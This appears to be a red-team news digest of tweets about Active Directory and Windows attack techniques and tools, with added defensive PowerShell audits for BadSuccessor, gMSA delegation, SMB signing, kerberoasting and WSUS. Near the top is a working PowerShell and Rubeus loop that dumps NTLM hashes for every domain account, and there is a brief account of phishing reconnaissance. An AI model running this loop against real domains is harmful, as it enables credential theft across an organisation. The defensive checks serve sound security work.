😈 [ David Kennedy @Cyb3rC3lt ]
Python version of BadSuccessor by Cybrly.
🔗 https://github.com/cybrly/badsuccessor
🐥 [ tweet ]
😈 [ Yuval Gordon @YuG0rd ]
Many missed this on #BadSuccessor: it’s also a credential dumper.
I wrote a simple PowerShell script that uses Rubeus to dump Kerberos keys and NTLM hashes for every principal: krbtgt, users, machines. No DCSync required, no code execution on DC.
🐥 [ tweet ]
What a demolition 😂🤣
upd. For the record, the author does something like this, with his own build of Rubeus:
# Assumes the ActiveDirectory RSAT module and a Rubeus build that exposes Invoke-Rubeus.
# $kirbi is the base64 TGT of the attacker-controlled dMSA obtained earlier; the original
# snippet does not show how it was acquired.
Import-Module ActiveDirectory
$domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
# Every user and computer account in the domain as DN + sAMAccountName pairs
$allDNs = @(Get-ADUser -Filter * | Select-Object @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) +
          @(Get-ADComputer -Filter * | Select-Object @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | ForEach-Object {
    # Point the dMSA's predecessor link at the next principal...
    Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
    # ...and request a dMSA ticket: the returned key package carries the predecessor's keys,
    # which Rubeus prints as "Previous Keys"
    $res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
    $rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
    "$($_.sAMAccountName):$rc4"
}
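The defender-side counterpart, as an added example that is not part of the post above or of the BadSuccessor tooling: a read-only audit for the two things the technique needs, an existing dMSA whose msDS-ManagedAccountPrecededByLink already points somewhere, and principals allowed to create dMSA objects in any OU or container. It assumes the ActiveDirectory RSAT module and a schema that contains the msDS-DelegatedManagedServiceAccount class (Windows Server 2025); the value 2 for msDS-DelegatedMSAState is taken from the public BadSuccessor write-up, and the exclusion list of expected principals at the end is a placeholder to tune per domain.

```powershell
# Added example, not from the original post: BadSuccessor precondition audit.
# Assumes the ActiveDirectory RSAT module; runs as any domain user with read access.
Import-Module ActiveDirectory

$rootDse   = Get-ADRootDSE
$domainDN  = $rootDse.defaultNamingContext
$dmsaClass = 'msDS-DelegatedManagedServiceAccount'

# 1. dMSAs that already carry a predecessor link. A link to krbtgt or to an
#    adminCount=1 principal is exactly what the credential-dumping loop produces.
Get-ADObject -LDAPFilter "(objectClass=$dmsaClass)" -SearchBase $domainDN `
    -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState, whenChanged |
    Where-Object { $_.'msDS-ManagedAccountPrecededByLink' } |
    ForEach-Object {
        $predDN = [string]$_.'msDS-ManagedAccountPrecededByLink'
        $pred   = Get-ADObject -Identity $predDN -Properties adminCount, sAMAccountName -ErrorAction SilentlyContinue
        [pscustomobject]@{
            dMSA        = $_.DistinguishedName
            # 2 = "migration completed", the value the public write-up sets (assumption, see lead-in)
            MSAState    = $_.'msDS-DelegatedMSAState'
            Predecessor = $pred.sAMAccountName
            Privileged  = ($pred.adminCount -eq 1) -or ($pred.sAMAccountName -eq 'krbtgt')
            Changed     = $_.whenChanged
        }
    }

# 2. Who can create dMSA objects anywhere in the domain. CreateChild scoped to the
#    dMSA class (or to all classes), or rights that imply it, is the entry point.
$schemaObj  = Get-ADObject -SearchBase $rootDse.schemaNamingContext `
    -LDAPFilter "(ldapDisplayName=$dmsaClass)" -Properties schemaIDGUID
$dmsaGuid   = [guid]$schemaObj.schemaIDGUID   # schemaIDGUID is stored as byte[]
$allClasses = [guid]::Empty                    # ACE not restricted to one object class

Get-ADObject -LDAPFilter '(|(objectClass=organizationalUnit)(objectClass=container))' -SearchBase $domainDN |
    ForEach-Object {
        $ou = $_.DistinguishedName
        (Get-Acl -Path "AD:\$ou").Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                ($_.ActiveDirectoryRights -match 'CreateChild|GenericAll|WriteDacl|WriteOwner') -and
                ($_.ObjectType -eq $dmsaGuid -or $_.ObjectType -eq $allClasses)
            } |
            ForEach-Object {
                [pscustomobject]@{
                    Container = $ou
                    Principal = $_.IdentityReference.Value
                    Rights    = $_.ActiveDirectoryRights
                }
            }
    } |
    # Placeholder exclusion list: tune to the principals expected to hold these rights
    Where-Object { $_.Principal -notmatch 'Domain Admins|Enterprise Admins|NT AUTHORITY\\SYSTEM' }
```

Anything left in the second list is a principal who can stage the attack; anything in the first list with Privileged = True is a dMSA that should be treated as an already-compromised copy of its predecessor.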
😈 [ Matt Ehrnschwender @M_alphaaa ]
I'm finally releasing a project that I've been working on for a little while now. Here's Boflink, a linker for Beacon Object Files.
🔗 https://github.com/MEhrn00/boflink
Supporting blog post about it.
🔗 https://blog.cybershenanigans.space/posts/boflink-a-linker-for-beacon-object-files/
🐥 [ tweet ]
Forwarded from PT SWARM
⚠️ We've reproduced CVE-2025-49113 in Roundcube.
This vulnerability allows authenticated users to execute arbitrary commands via PHP object deserialization.
If you're running Roundcube — update immediately!
😈 [ Aditya Telange @adityatelange ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
😈 [ Fabian @testert01 ]
Unconstrained delegation on a gMSA, plus WebClient / NTLMv1 active on servers that can retrieve the credentials of that gMSA, can lead to a complete domain compromise from domain users.
@micahvandeusen, @_dirkjan, nice tools :)
🔗 https://nothingspecialforu.github.io/UCgMSAExploitation/
🐥 [ tweet ]
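The precondition chain in that post, enumerated from the defender's side, as an added example that is not from the linked write-up or the tools it credits. It assumes the ActiveDirectory RSAT module for the directory half and WinRM access to the candidate servers for the host half; "NTLMv1 active" is interpreted here as LmCompatibilityLevel explicitly set below 3 (an assumption about what the write-up means), and the hostname in the usage comment is a placeholder.

```powershell
# Added example, not from the original post: gMSA unconstrained-delegation exposure check.
Import-Module ActiveDirectory

$TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit for unconstrained delegation

# 1. gMSAs flagged for unconstrained delegation, and which principals may read their password.
$riskyGmsa = Get-ADServiceAccount `
    -LDAPFilter "(&(objectClass=msDS-GroupManagedServiceAccount)(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION))" `
    -Properties PrincipalsAllowedToRetrieveManagedPassword, servicePrincipalName

foreach ($g in $riskyGmsa) {
    # Expand groups: every member host can fetch the gMSA password and act as the delegating identity.
    $readers = foreach ($p in $g.PrincipalsAllowedToRetrieveManagedPassword) {
        $obj = Get-ADObject -Identity $p
        if ($obj.ObjectClass -eq 'group') {
            Get-ADGroupMember -Identity $p -Recursive | Select-Object -ExpandProperty Name
        } else {
            $obj.Name
        }
    }
    [pscustomobject]@{
        gMSA            = $g.SamAccountName
        SPNs            = ($g.servicePrincipalName -join ';')
        PasswordReaders = ($readers -join ';')
    }
}

# 2. On a reader host: WebClient (WebDAV) running and NTLMv1 permitted are the two
#    conditions the post names on the server side.
function Test-ReaderHost {
    param([string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $svc = Get-Service -Name WebClient -ErrorAction SilentlyContinue
        $lm  = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
                    -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
        [pscustomobject]@{
            Host             = $env:COMPUTERNAME
            WebClientRunning = ($svc.Status -eq 'Running')
            # Levels 0-2 still send LM/NTLMv1 responses; an absent value means the OS default (assumed 3)
            NtlmV1Allowed    = ($null -ne $lm -and $lm -lt 3)
        }
    }
}
# Test-ReaderHost -ComputerName 'srv01'   # placeholder hostname taken from the PasswordReaders column
```

A gMSA that shows up in the first part with a reader host that answers True/True in the second is the full chain; removing the delegation flag (or narrowing PrincipalsAllowedToRetrieveManagedPassword) breaks it at the directory, stopping WebClient and setting LmCompatibilityLevel to 5 breaks it on the host.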
😈 [ mr.d0x @mrd0x ]
Finally had some time to publish these blogs. Enjoy!
Spying On Screen Activity Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-screensharing/
Camera and Microphone Spying Using Chromium Browsers
🔗 https://mrd0x.com/spying-with-chromium-browsers-camera/
🐥 [ tweet ]
😈 [ James Woolley @Xtrato ]
I left a server online with VNC wide open to see how it would be interacted with. This is one of the more interesting interactions 👆
🐥 [ tweet ]
😈 [ RedTeam Pentesting @RedTeamPT ]
🚨 Our new blog post about Windows CVE-2025-33073 which we discovered is live.
🪞 The Reflective Kerberos Relay Attack - Remote privilege escalation from low-priv user to SYSTEM with RCE by applying a long forgotten NTLM relay technique to Kerberos:
🔗 https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/
👀 We have also released a paper which really goes into the nitty-gritty for those who are interested:
🔗 https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf
🐥 [ tweet ]
😈 [ Synacktiv @Synacktiv ]
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Check out the details in the blog post by @yaumn_ and @wil_fri3d.
🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
🐥 [ tweet ]
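Both posts above name the same precondition: the target accepts unsigned SMB sessions. The check and the corrected setting, as an added example that is not from either blog post; it assumes the built-in SmbShare module (Windows 8 / Server 2012 and later) and local administrator rights for the enforcement half.

```powershell
# Added example, not from the original posts: SMB signing state and enforcement.
function Get-SmbSigningState {
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration
    [pscustomobject]@{
        Host                  = $env:COMPUTERNAME
        # Inbound side: a server that does not *require* signing is the relay target
        ServerRequiresSigning = $server.RequireSecuritySignature
        ServerEnablesSigning  = $server.EnableSecuritySignature
        # Outbound side: a client that requires signing refuses servers that cannot sign
        ClientRequiresSigning = $client.RequireSecuritySignature
    }
}

function Enable-SmbSigningEnforcement {
    # Weak setting: RequireSecuritySignature = $false (the default on non-DC members).
    # Corrected setting: require it on both server and client; -Force skips the confirmation prompt.
    Set-SmbServerConfiguration -RequireSecuritySignature $true -EnableSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
}

$state = Get-SmbSigningState
$state
if (-not $state.ServerRequiresSigning) {
    Write-Warning "SMB server signing is not required on $($state.Host); inbound authentication can be relayed."
    # Enable-SmbSigningEnforcement   # uncomment to enforce on this host
}
```

Signing enforcement is the mitigation both posts point at for the unpatched case; it is independent of the patch itself and worth keeping on after patching, since it also closes the classic NTLM relay paths.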
😈 [ Praetorian @praetorianlabs ]
🚨 New attack disclosed: GitHub Device Code Phishing
John, Matt, and Mason reveal how they've been using this technique to compromise F500 orgs with high success rates.
📖 Blog covers methodology, red team case studies & detection strategies
🔗 https://www.praetorian.com/blog/introducing-github-device-code-phishing/
🐥 [ tweet ]
😈 [ Jonathan Beierle @hullabrian ]
I just released COMmander - a .NET tool designed to provide an easy-to-use interface for COM- and RPC-based attacks. It taps into the Microsoft-Windows-RPC ETW provider and allows you to provide a customizable rule set for detections.
🔗 https://github.com/HullaBrian/COMmander
🐥 [ tweet ]
Forwarded from Positive Technologies
How the team prepared for and carried out social-engineering attacks, what came of it and how it helped clients is described in detail in an article for Positive Research by Konstantin Polishin, head of the Red Team SE group in the Positive Technologies penetration testing department.
You would be surprised how much can be learned about a company using passive reconnaissance alone. For example, the technology stack in use is easy to find in IT job postings and employees' resumes, and corporate email addresses in public data leaks and infostealer logs. And if you gather information actively, you can assemble entire dossiers on prospective victims from various sources.
🎣 After that it remains to carefully select a focus group, develop a phishing scenario and cast the line again and again until it works. To do this, red teamers (like the attackers they emulate) carefully study mailbox contents, keywords in emails, the corporate communication style, and the company's internal life and processes.
#PositiveResearch
@Positive_Technologies
😈 [ Elastic Security Labs @elasticseclabs ]
Dive deep into malware detection with the latest article by John Uhlmann: "Call Stacks: No More Free Passes for Malware." Discover how call stacks provide vital insights into malware behavior. Read more:
🔗 https://www.elastic.co/security-labs/call-stacks-no-more-free-passes-for-malware/
🐥 [ tweet ]
😈 [ SpecterOps @SpecterOps ]
Introducing the BloodHound Query Library!
📚 https://queries.specterops.io/
@martinsohndk & @joeydreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
🔗 https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
🐥 [ tweet ]
😈 [ Alex Neff @al3x_n3ff ]
Did you know that you can kerberoast without any valid credentials? All you need is an account that is ASREProastable.
This allows you to request service tickets for any account with a set SPN🔥
NetExec now has a native implementation of this technique, thanks to Azox
🐥 [ tweet ]
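The technique pairs two account sets: a principal with DONT_REQ_PREAUTH set (usable as the AS-REQ client by anyone, since no pre-authentication is checked) and a service account with an SPN (named as the sname of that AS-REQ instead of krbtgt, so the returned ticket is encrypted under the service account's key and can be cracked offline like a TGS). Enumerating both from the directory, as an added example that is not from the tweet or from NetExec; it assumes the ActiveDirectory RSAT module and, for the etype column, that an empty msDS-SupportedEncryptionTypes means the domain default still offers RC4.

```powershell
# Added example, not from the original post: preconditions for Kerberoasting without credentials.
Import-Module ActiveDirectory

$DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit (decimal 4194304)

# 1. Accounts an unauthenticated attacker can name as the client in the AS-REQ.
#    Disabled accounts are listed too, but the KDC rejects them, hence the Enabled column.
$noPreauth = Get-ADUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=$DONT_REQ_PREAUTH)" |
    Select-Object SamAccountName, Enabled

# 2. Accounts whose tickets come back crackable: user objects (Get-ADUser excludes
#    computers) with an SPN, krbtgt aside.
$roastable = Get-ADUser -LDAPFilter '(&(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))' `
    -Properties servicePrincipalName, msDS-SupportedEncryptionTypes, PasswordLastSet |
    ForEach-Object {
        $age = if ($_.PasswordLastSet) { (New-TimeSpan -Start $_.PasswordLastSet -End (Get-Date)).Days } else { $null }
        [pscustomobject]@{
            SamAccountName  = $_.SamAccountName
            FirstSPN        = $_.servicePrincipalName[0]
            # RC4 (etype 23) tickets crack fastest; $null here means domain default (assumed to include RC4)
            SupportedEtypes = $_.'msDS-SupportedEncryptionTypes'
            PasswordAgeDays = $age
        }
    }

"Accounts without pre-authentication (any of these can be the AS-REQ client):"
$noPreauth | Format-Table -AutoSize
"Service accounts whose tickets can be obtained via that path, oldest password first:"
$roastable | Sort-Object PasswordAgeDays -Descending | Format-Table -AutoSize
```

The first list is the thing to fix: clearing DONT_REQ_PREAUTH on those accounts closes the unauthenticated path entirely, while the second list is the usual Kerberoast hygiene (long random passwords, AES-only etypes, or gMSAs).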
😈 [ Adam Chester 🏴☠️ @_xpn_ ]
My second blog post of the month is up. Nothing too crazy, this time I’m looking at the upcoming Windows Administrator Protection feature… How it works, what continues to work, and some reversing. Check it out (or not I’m not your mum!)
🔗 https://specterops.io/blog/2025/06/18/administrator-protection/
🐥 [ tweet ]
Apply for the Pentest Award 2025 before 30 June!
It is an industry award for penetration testing specialists, held for the third time. The main goal of the award is to highlight the best specialists and show their contribution to the development of Russian pentesting.
Participation is free; finalists receive Apple hardware and the highest respect of the ethical hacking community. The award ceremony will take place on 1 August in Moscow.
An application is a free-form write-up of your best project. There is no need to disclose exploits: any steps in the exploitation chain can be fully anonymized and details can be withheld; what matters is to convey the approach and the idea.
Apply and find out more on the website: https://award.awillix.ru/
😈 [ Alex Neff @al3x_n3ff ]
Releasing a side project of mine: wsuks - automating the WSUS mitm attack🔥
🔗 https://github.com/NeffIsBack/wsuks
TL;DR:
If the Windows Server Update Service (WSUS) is configured to use HTTP instead of HTTPS, it's possible to take control of any Windows machine on your local network.
🐥 [ tweet ]
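The condition in that TL;DR is a client-side policy setting, so it can be audited from the endpoint. The following is an added example, not from wsuks or its README: it reads the standard WindowsUpdate policy keys and flags the plaintext-HTTP case; the hosts.txt path in the fleet-wide comment is a placeholder.

```powershell
# Added example, not from the original post: WSUS transport check on a client.
function Get-WsusTransportState {
    $pol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    $wu  = Get-ItemProperty -Path $pol       -ErrorAction SilentlyContinue
    $au  = Get-ItemProperty -Path "$pol\AU"  -ErrorAction SilentlyContinue

    # UseWUServer=1 under \AU switches the client from Microsoft Update to the WUServer URL
    $usesWsus = ($au.UseWUServer -eq 1) -and [bool]$wu.WUServer
    $server   = $wu.WUServer

    [pscustomobject]@{
        Host          = $env:COMPUTERNAME
        UsesWsus      = [bool]$usesWsus
        WUServer      = $server
        StatusServer  = $wu.WUStatusServer
        # The MITM condition from the post: update metadata and payloads fetched over
        # plaintext HTTP, so an impersonated WSUS server can answer in the real one's place.
        PlaintextHttp = [bool]($usesWsus -and $server -match '^http://')
    }
}

Get-WsusTransportState

# Fleet-wide over WinRM (placeholder host list); ${function:...} passes the function body as the script block
# Invoke-Command -ComputerName (Get-Content .\hosts.txt) -ScriptBlock ${function:Get-WsusTransportState} |
#     Where-Object PlaintextHttp | Select-Object Host, WUServer
```

The fix lives on the server, not the client: publish the WSUS endpoint over HTTPS and update the WUServer / WUStatusServer policy to the https:// URL, after which this check reports PlaintextHttp = False.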
😈 [ Andrew @4ndr3w6S ]
Happy to finally share a new blog with @exploitph on our work revisiting the Kerberos Diamond Ticket.
✅ /opsec for a more genuine flow
✅ /ldap to populate the PAC
🆕 Forge a diamond service ticket using an ST
We finally gave it a proper cut 💎
🔗 https://www.huntress.com/blog/recutting-the-kerberos-diamond-ticket
🐥 [ tweet ]